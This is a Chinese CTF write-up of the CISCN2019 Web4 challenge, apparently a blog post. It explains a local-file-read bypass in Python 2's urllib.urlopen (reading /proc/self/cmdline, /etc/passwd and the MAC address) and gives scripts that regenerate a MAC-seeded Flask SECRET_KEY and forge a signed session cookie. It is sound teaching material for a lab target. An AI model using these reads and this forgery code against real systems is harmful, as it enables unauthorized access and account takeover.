# [CISCN2019 华东南赛区]Web4

0x01 Preface

  • Sensitive file read

  • Flask session forgery

0x02 Sensitive file read

Commonly read paths

/etc/passwd
Used to confirm that the file read actually works.
/etc/environment
One of the environment-variable configuration files. Environment variables often leak a lot of directory information and sometimes even a secret key.
/etc/hostname
The host name.
/etc/issue
The system version.
The /proc directory
/proc/[pid] a process by PID
/proc/self the process currently serving the request
/proc/self/cmdline the command line the current process was started with (argv, NUL-separated)
/proc/self/cwd symlink to the directory the program is running in
/proc/self/environ the current process's environment variables (NUL-separated KEY=VALUE)
/sys/class/net/eth0/address where the MAC address of eth0 is read from


Read /proc/self/cmdline first: it reveals the script the application was started with, which is app/app.py.

Then read app/app.py. The filter in the read() route only rejects URLs that begin with "file" or contain "flag"; Python 2's urllib.urlopen dispatches on "open_" + scheme, so a scheme-less path is opened as a local file and the local_file:// spelling is not blocked either, which is what makes these reads possible.


```python
# encoding:utf-8
# Python 2 source recovered from the target (note the print statement and urllib.urlopen).
import re, random, uuid, urllib
from flask import Flask, session, request

app = Flask(__name__)
# uuid.getnode() is the host's MAC address as a 48-bit integer, so the PRNG
# state, and with it SECRET_KEY, depends only on the MAC address.
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*233)
app.debug = True

@app.route('/')
def index():
    session['username'] = 'www-data'
    return 'Hello World! <a href="/read?url=https://baidu.com">Read somethings</a>'

@app.route('/read')
def read():
    try:
        url = request.args.get('url')
        # Blacklist: the URL may not start with "file" and may not contain "flag".
        m = re.findall('^file.*', url, re.IGNORECASE)
        n = re.findall('flag', url, re.IGNORECASE)
        if m or n:
            return 'No Hack'
        # urllib.urlopen also opens local paths, which gives the file read.
        res = urllib.urlopen(url)
        return res.read()
    except Exception as ex:
        print str(ex)
    return 'no response'

@app.route('/flag')
def flag():
    # Only a session whose username is 'fuck' is accepted; nothing in the app
    # ever sets that value, so the session has to be forged.
    if session and session['username'] == 'fuck':
        return open('/flag.txt').read()
    else:
        return 'Access denied'

if __name__=='__main__':
    app.run(
        debug=True,
        host="0.0.0.0"
    )
```
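As an added example (my code, not code from the writeup), a small Python 3 helper that re-implements the two regex checks from the read() route above so a URL can be tested offline before it is sent, and that parses the NUL-separated /proc/self/cmdline and /proc/self/environ formats listed in 0x02 into an argv list and a dict. The procfs contents below are constructed samples, not captured from the target. The candidate_urls() helper relies on Python 2's urllib.URLopener resolving "open_" + scheme, which is why a scheme-less path and local_file:// get through while file:// does not.

```python
import re

# Constructed sample procfs contents (not captured from the real target).
# /proc/self/cmdline is argv joined by NUL bytes; /proc/self/environ is
# KEY=VALUE pairs joined by NUL bytes. Both end with a trailing NUL.
SAMPLE_CMDLINE = b"python\x00app/app.py\x00"
SAMPLE_ENVIRON = b"PATH=/usr/local/bin:/usr/bin\x00HOME=/app\x00LANG=C.UTF-8\x00"


def read_filter_allows(url):
    """Re-implementation of the two checks in the challenge's /read route.

    Returns True when the URL would reach urllib.urlopen(). Note what the
    checks do NOT cover: '^file' is anchored at the start of the string, so
    only URLs that literally begin with 'file' are blocked, while 'flag' is
    matched anywhere, so /flag.txt can never be fetched through this route.
    """
    m = re.findall('^file.*', url, re.IGNORECASE)
    n = re.findall('flag', url, re.IGNORECASE)
    return not (m or n)


def parse_cmdline(raw):
    """Split a /proc/<pid>/cmdline blob into the argv list."""
    return [arg.decode("utf-8", "replace") for arg in raw.split(b"\x00") if arg]


def parse_environ(raw):
    """Split a /proc/<pid>/environ blob into a dict of environment variables."""
    env = {}
    for item in raw.split(b"\x00"):
        if not item:
            continue
        key, _, value = item.decode("utf-8", "replace").partition("=")
        env[key] = value
    return env


def find_script(argv):
    """Return the first argv entry that looks like the Python script being run,
    i.e. the path worth requesting next through /read (None if not found)."""
    for arg in argv:
        if arg.endswith(".py"):
            return arg
    return None


def candidate_urls(path):
    """For a local path, list the spellings the filter lets through. Python 2's
    urllib.URLopener dispatches on 'open_' + scheme: a scheme-less path is
    treated as scheme 'file' and 'local_file://' resolves to open_local_file,
    so 'file://' itself is the only spelling the regex stops."""
    forms = [path, "file://" + path, "local_file://" + path]
    return [u for u in forms if read_filter_allows(u)]


if __name__ == "__main__":
    argv = parse_cmdline(SAMPLE_CMDLINE)
    print("argv:", argv)
    print("script:", find_script(argv))
    print("environ:", parse_environ(SAMPLE_ENVIRON))
    for p in ["/etc/passwd", "/proc/self/cmdline", "/flag.txt"]:
        print(p, "->", candidate_urls(p))
```

Running it shows that /flag.txt has no allowed spelling at all, which is the reason the writeup moves on to forging the session instead of reading the flag directly.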

0x03 Flask session forgery

The logic is simple: /flag returns the flag only when session['username'] == 'fuck'. The /read route cannot fetch /flag.txt itself, since any URL containing "flag" is rejected, so the session has to be forged.

Forging a session requires SECRET_KEY. app.py seeds the PRNG with uuid.getnode(), which is the machine's MAC address as a 48-bit integer, so SECRET_KEY is completely determined by the MAC address.

First decode the existing session cookie with the script below (no key is needed for this: the cookie is signed, not encrypted).

```python
#!/usr/bin/env python3
# Decodes a Flask session cookie WITHOUT the secret key: the payload is only
# signed, not encrypted, so its contents are readable by anyone. The signature
# is simply discarded here, not verified.
import sys
import zlib
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode

def decryption(payload):
    # cookie layout: [.]base64(payload).base64(timestamp).base64(signature)
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)

    # a leading '.' means itsdangerous zlib-compressed the payload
    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                         'an exception')

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                             'decoding the payload')

    # Flask's tagged JSON serializer restores special types (bytes, tuples, ...)
    return session_json_serializer.loads(payload)

if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))
```

python3 1.py <session cookie value>

Decoding gives {'username': b'www-data'}. The value comes back as bytes because the target runs Python 2, where a plain str is a byte string, so Flask's tagged JSON serializer marks it as such.

The key is then regenerated the same way app.py does:

```python
import random
# Seed the PRNG with the MAC address as an integer, exactly as app.py does.
random.seed(2485377863463)
# Run this under Python 2: str() there keeps 12 significant digits, whereas
# Python 3 would print up to 17 and therefore produce a different key string.
print(str(random.random()*233))
```

Use the arbitrary file read to obtain the target's MAC address.

MAC address: /sys/class/net/eth0/address

The MAC address is a string of hex digits; convert it to decimal (or write it as a 0x literal of the 12 hex digits) before passing it to random.seed(). The seed used above, 2485377863463, is 02:42:ac:10:8f:27.

Result:

34.6711578158
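As an added example (my code, neither the author's script nor the flask-session-cookie-manager tool linked below), the whole key-recovery and forgery chain in one place using only the standard library: convert the MAC string read from /sys/class/net/eth0/address into the integer uuid.getnode() would return, reproduce app.py's SECRET_KEY with Python 2's 12-digit float formatting emulated, and then sign a session the way Flask's SecureCookieSessionInterface does (itsdangerous URLSafeTimedSerializer with salt "cookie-session", HMAC key derivation and SHA-1). The MAC 02:42:ac:10:8f:27 is the one the page's decimal seed corresponds to; the session contents are constructed.

```python
import base64
import hashlib
import hmac
import json
import random
import time
import zlib

SALT = b"cookie-session"  # Flask's SecureCookieSessionInterface.salt


def mac_to_node(mac):
    """Turn '02:42:ac:10:8f:27' (the /sys/class/net/eth0/address format) into
    the 48-bit integer that uuid.getnode() returns on the target."""
    return int(mac.replace(":", "").replace("-", ""), 16)


def py2_float_str(x):
    """Python 2's str(float): 12 significant digits ('%.12g'), with '.0'
    appended when the result looks like an integer. Python 3's str() keeps up
    to 17 digits, so a key computed under Python 3 without this emulation is a
    different string and every signature made with it fails."""
    s = "%.12g" % x
    if "." not in s and "e" not in s and "inf" not in s and "nan" not in s:
        s += ".0"
    return s


def secret_key_from_node(node):
    """Reproduce app.py: random.seed(uuid.getnode()); str(random.random()*233).
    Seeding with an int yields the same random() in Python 2 and 3, so only
    the str() formatting needs emulating."""
    rng = random.Random(node)
    return py2_float_str(rng.random() * 233)


def _b64(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=")


def _unb64(data):
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def _derive_key(secret_key):
    # itsdangerous key_derivation='hmac': HMAC-SHA1(secret_key, salt)
    return hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()


def sign_session(secret_key, data, timestamp=None):
    """Build a Flask session cookie like itsdangerous' URLSafeTimedSerializer:
    [.]base64(json) . base64(timestamp) . base64(hmac)."""
    payload = json.dumps(data, separators=(",", ":")).encode()
    compressed = zlib.compress(payload)
    if len(compressed) < len(payload) - 1:  # same size rule as itsdangerous
        body = b"." + _b64(compressed)
    else:
        body = _b64(payload)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8 or 1, "big")
    value = body + b"." + _b64(ts_bytes)
    sig = hmac.new(_derive_key(secret_key), value, hashlib.sha1).digest()
    return (value + b"." + _b64(sig)).decode()


def verify_session(secret_key, cookie):
    """Check the signature and return the session dict, or None on a bad key."""
    value, _, sig = cookie.encode().rpartition(b".")
    expected = hmac.new(_derive_key(secret_key), value, hashlib.sha1).digest()
    if not hmac.compare_digest(_b64(expected), sig):
        return None
    body, _, _ = value.rpartition(b".")
    raw = zlib.decompress(_unb64(body[1:])) if body.startswith(b".") else _unb64(body)
    return json.loads(raw)


if __name__ == "__main__":
    node = mac_to_node("02:42:ac:10:8f:27")  # the MAC behind the page's seed
    key = secret_key_from_node(node)
    cookie = sign_session(key, {"username": "fuck"})
    print("seed:", node)
    print("SECRET_KEY:", key)
    print("session=" + cookie)
    print("verifies as:", verify_session(key, cookie))
```

The printed cookie is what goes into the session cookie before requesting /flag. If the key is computed on a Python 3 box with plain str(), verify_session() on the server side is exactly the check that fails, which is the usual reason this challenge "does not work" even with the right MAC.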

Then sign {'username': 'fuck'} with this key using a Flask session forgery tool such as

https://github.com/noraj/flask-session-cookie-manager

Replace the session cookie value with the forged one and request /flag to get the flag.

Posted 2021-10-17 12:44 by 步行街